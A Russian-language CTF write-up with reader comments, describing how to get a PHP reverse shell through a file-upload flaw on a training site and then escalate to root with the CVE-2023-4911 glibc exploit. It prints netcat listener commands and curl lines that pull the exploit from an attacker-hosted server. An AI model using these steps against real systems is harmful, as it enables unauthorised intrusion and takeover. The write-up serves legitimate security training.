Writeup [WriteUp] web-1-1 web-1-2 library.edu.stf | Standoff 365

CTF reference: Bootcamp (standoff365.com)

Сontents:
Web-1-1
-Step 1: Preparing
-Step 2: Gathering information
-Step 3: Attack
Web-1-2

---

Web-1-1​

Step 1: Preparing​

используем команду и добавляем следующие записи
sudo nano /etc/hosts

10.124.1.231   aircraft.edu.stf
10.124.1.232   calculator.edu.stf
10.124.1.233   library.edu.stf
10.124.1.234   wp.edu.stf
10.124.1.235   www.edu.stf
10.124.1.236   gallery.edu.stf
10.124.1.237   utils.edu.stf
10.124.1.238   shop.edu.stf
10.124.1.239   tokenizer.edu.stf
10.124.1.240   bind.edu.stf
10.124.1.241   smashmusic.edu.stf
10.124.1.242   test-webserver.edu.stf
10.124.1.253   vpn.edu.stf

​

Step 2: Gathering information​

Переходим на страницу http://library.edu.stf/
и видим сылку на либу(нижний правый угол ), переходим на нее
Попадаем на следующий страничку с интерфейсом загрузки файлов.

Так зная что это за уязвимость(в названии задания php upload ) я сразу загуглил (это файл стандартный файл что можно использовать в таких рода заданиях)
reverse shell php in google
answer: GitHub - pentestmonkey/php-reverse-shell

Почему php? потому что расширение в браузере показывает какие есть языки на веб сервере

Далее следует скопировать файл, используя удобный способ, по следующему адресу:
php-reverse-shell.php.После загрузки файла откройте его для ознакомления .
Обратите внимание, что необходимо изменить значения IP-адреса и порта на свои собственные. Чтобы узнать свой IP-адрес, выполните команду ip a .
(И смотрим значение tun0 Так как нам нужно значение нашего айпи в ВПН(tun0 как раз и будет нашим впн), это важно)

В значении порт указывает тот порт что мы будем слушать через команду rlwrap nc -lnvp YOUR PORT или nc -lnvp YOUR PORT

​

Step 3: Attack​

Теперь нужно провести нашу атаку.
(Перед атакой, вам нужно настроить burp proxy На вашей машинке . Погуглите. )
Перехватываем запрос на загрузку файлов. и меняем сдедующие параметры

Подробнее об уязвимостях этого функционала можно прочитать здесь:

• https://portswigger.net/web-security/file-upload (здесь можно выполнять задания по этой теме)
• https://book.hacktricks.xyz/pentesting-web/file-upload

После загрузки

Теперь нам нужно было запустить(выполнить) наш скрипт. Я нашел на сайте обычную картинку, посмотрел ее URL и понял, где искать свой файл.

В адресной строке я увидел что-то вроде: http://library.edu.stf/wp-content/ch1.png
Изучив данный Url я получил представление где искать наши(-у) картинки

http://library.edu.stf/wp-content/shell33.php

Преждем чем его вызвать не забудьте включить
nc -lnvp 4545
(4545 это порт что был в нашем скрипте)

Если вы все сделали правильно то вы увидите

Далее по заданию запускаем скрипт и получаем флаг
./home/rceflag

​

web-1-2 Lpe​

Примечание от автора

Некоторые cve poc просто напросто не работали, стоит поискать другие...
если не ошибаюсь ... попробуйте вот этот GitHub - hadrian3689/looney-tunables-CVE-2023-4911

Повышение привилегий на линукс довольная большая тема, и проверяемая различные векторы атак я наткнулся на нужный нам

Проверяем версию
ldd --version
Вывод будет примерно таким:

 ldd (Ubuntu GLIBC 2.35-0ubuntu3.4) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Загуглив ldd 2.35 cve poc
Нашел следующий эксплоит CVE-2023-4911
Проверьте, находится ли версия glibc в диапазоне от 2.34 до 2.39. Если да, то ваш сервер уязвим.
(не скину ссылку на уязвимость так как той которой я пользовался.... была удаленна с gihub ... печально )

После того как вы нашли нужный poc его стоит скачать на вашу машину , а после и на машину жертвы
Запускаем питон сервер на нашей машине, в той же папке и где наш эксплоит
python3 -m http.server 4646

На машине жертвы :
переходим в каталог /var/www/html/wordpress
Используем Curl -O Для скачивания и флаг -O для сохранения этих файлов
curl -O http://<your_ip>:4646/exp.c
curl -O http://<your_ip>:4646/libc.py
Выдаем права за запуск всем файлам
chmod +x *

По инструкции с github запускам
python3 libc.py
и компилим наш эксплоит
gcc exp.c -o exp

Даллее запускаем
./exp
если все прошло успешно проверям наши права через команду Id
id uid=0(root) gid=33(www-data) groups=33(www-data)

И запускаем последний скрипт для получения второго файла

./home/lpeflag

Авторы:

Автор: Archivist
vasya.kotov.8080@mail.ru
Соавтор: Nebty
alex122303q@gmail.com

 

[Let us Play Football]

$ python3 gen_libc.py
Traceback (most recent call last):
File "/var/www/html/wordpress/gen_libc.py", line 3, in <module>
from pwn import *
ModuleNotFoundError: No module named 'pwn'


how to solve this problem?

 

[Archivist]

Hey,

I noticed that you are using an exploit called 'gen_libc.py'. This script requires the 'pwn' library, which is missing from the victim's machine. In my article, I utilized a different script.
The photo below will show which one I used (GitHub - hadrian3689/looney-tunables-CVE-2023-4911)

If you're unable to do that, consider the following options:

1. Look for an alternative exploit.
2. Request a restart of the machine on the platform.
3. Generate the library on your own machine and then transfer it to the victim's machine.

 

[Местный]

Давай больше райтапов по standoff, пожалуйста

 

[OxDEADBEEF]

$ python3 gen_libc.py
Traceback (most recent call last):
File "/var/www/html/wordpress/gen_libc.py", line 3, in <module>
from pwn import *
ModuleNotFoundError: No module named 'pwn'


how to solve this problem?

pip install pwntools, pwn

 

[PSY12]

Всем привет. Уже очень долго сижу над этой таской, второй его частью по повышению привилегий (web-1-2). Помогите советом плз.
Проверил версию ldd (ldd --version) - 2.36. Начал искать эксплойт для неё.
1. Пробовал использовать этот - GitHub - leesh3288/CVE-2023-4911: PoC for CVE-2023-4911. Неуспешно. Требует модуль pwn, который на тачке установить нельзя, pip install pwntools, pwn не работает.
2. Затем пробовал этот - GitHub - hadrian3689/looney-tunables-CVE-2023-4911. Зависимоcтей нет, и даже команды отрабатывают. Но при запуске самого эксплойта (./exp) сессия рута не открывается (просто отправляются команды без ответов). Пробовал перенаправлять вывод команд в файл, но нет.
3. Потом пробовал эксплойт с сайта https://haxx.in/files/gnu-acme.py. Тоже неуспешно. Проблемы с оффсетом и build_id. Всяко разно изменял скрипт, но либо также отправляются команды без ответов, либо открывается такой же шелл от www-data.
Помогите советом куда копать, пожалуйста =) Какой эксплойт рабочий?